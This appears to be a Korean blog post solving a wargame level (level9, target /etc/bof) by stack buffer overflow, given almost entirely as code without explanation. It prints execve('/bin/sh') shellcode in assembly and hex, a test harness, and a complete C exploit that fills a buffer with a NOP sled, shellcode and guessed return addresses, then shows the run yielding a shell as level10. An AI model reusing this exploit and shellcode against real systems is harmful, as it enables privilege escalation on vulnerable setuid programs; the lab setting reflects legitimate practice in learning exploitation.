Bound checking 을 하지 않아 발생하는 보안 문제이다.
Hint – /etc/bof
———
이번엔 삼일정도 걸렸네요;; 재밌었지만 힘들었음.
설명없이 gogo~
[root@protos tmp]# cat shellcodeasm.c
void main()
{
__asm__(“jmp pushing # jumps to call statement\n\t”
“getting:”
“popl %esi # get the addr of /bin/sh string\n\t”
“movl %esi, 0x8(%esi) # write addr of /bin/sh after /bin/sh(NULL)\n\t”
“xorl %eax, %eax # make zero valued register\n\t”
“movb %al, 0x7(%esi) # make /bin/sh string null terminated\n\t”
“movl %eax, 0xc(%esi) # long-word size zeros\n\t”
“movb $0xb, %al # execve system call number\n\t”
“movl %esi, %ebx # address of /bin/sh(NULL)\n\t”
“leal 0x8(%esi), %ecx # get the addr of addr of /bin/sh(NULL)\n\t”
“leal 0xc(%esi), %edx # get the addr of long-word size zeros\n\t”
“int $0x80 # into the kernel mode\n\t”
“xorl %ebx, %ebx # return code of exit\n\t”
“movl %ebx, %eax # exit() system call number is 1\n\t”
“inc %eax # exit() system call number is 1\n\t”
“int $0x80 # into the kernel mode\n\t”
“pushing:”
“call getting # to push the addr of /bin/sh string\n\t”
“.string “/bin/sh”\n\t”
);
}
[root@protos tmp]# cat testsc.c
char shellcode[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46"
"\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8"
"\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main()
{
int *ret;
ret = &ret + 2;
(*ret) = (int) shellcode;
}
[level9@drill h4q0]$ cat exploit.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define NOP 0x90
#define DEFAULT_OFFSET 0
char shellcode[]=”\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46″
“\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e”
“\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8”
“\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”;
unsigned long sp(void)
{
__asm__(“movl %esp, %eax”);
}
int main(int argc, char *argv[])
{
int i, offset, buffer_size, nop_sled_size;
long esp, ret, *addr_ptr;
char *buffer, *ptr;
if (argc != 2 && argc != 3)
{
printf(“usage: exploit [buffer size] [offset]\n”);
exit(0);
}
buffer_size = atoi(argv[1]);
printf(“BUFFER_SIZE: %d\n”, buffer_size);
if (argc == 3) offset= atoi(argv[2]);
else offset = DEFAULT_OFFSET;
printf(“OFFSET: %d\n”, offset);
esp = sp(); // Get the current ESP
printf(“ESP: 0x%x\n”, esp);
ret = esp – offset; // Location of the buffer of the victim
buffer = (char *) malloc(buffer_size);
// Return Addresses
printf(“RET: 0x%x\n”, ret);
addr_ptr = (long *) buffer;
for (i = 0; i < buffer_size; i+=4)
*(addr_ptr++) = ret;
// NOP sled
nop_sled_size = buffer_size / 2;
printf(“NOP SLED: %d\n”, nop_sled_size);
if (nop_sled_size > 0)
{
for (i = 0; i < nop_sled_size; i++)
buffer[i] = NOP;
ptr = buffer + nop_sled_size – strlen(shellcode) / 2;
}
else
{
ptr = buffer;
}
// SHELLCODE
printf (“SHELL CODE SIZE: %d\n”, strlen(shellcode));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buffer[buffer_size-1] = ‘\0’;
// Run the bof
execl(“/etc/bof”, “bof”, buffer, NULL);
free(buffer);
return 0;
}
[level9@drill h4q0]$ ./exploit 100 88
BUFFER_SIZE: 100
OFFSET: 88
ESP: 0xbffffaf4
RET: 0xbffffa9c
NOP SLED: 50
SHELL CODE SIZE: 45
hello~ 릱릱릱릱릱릱릱릱릱릱릱릱릱릱??핂F덯
?
됹뜊V
?1???汪/bin/sh?퓶?퓶?퓶?퓶?퓶?퓶?
bash$ whoami
level10
Leave a Reply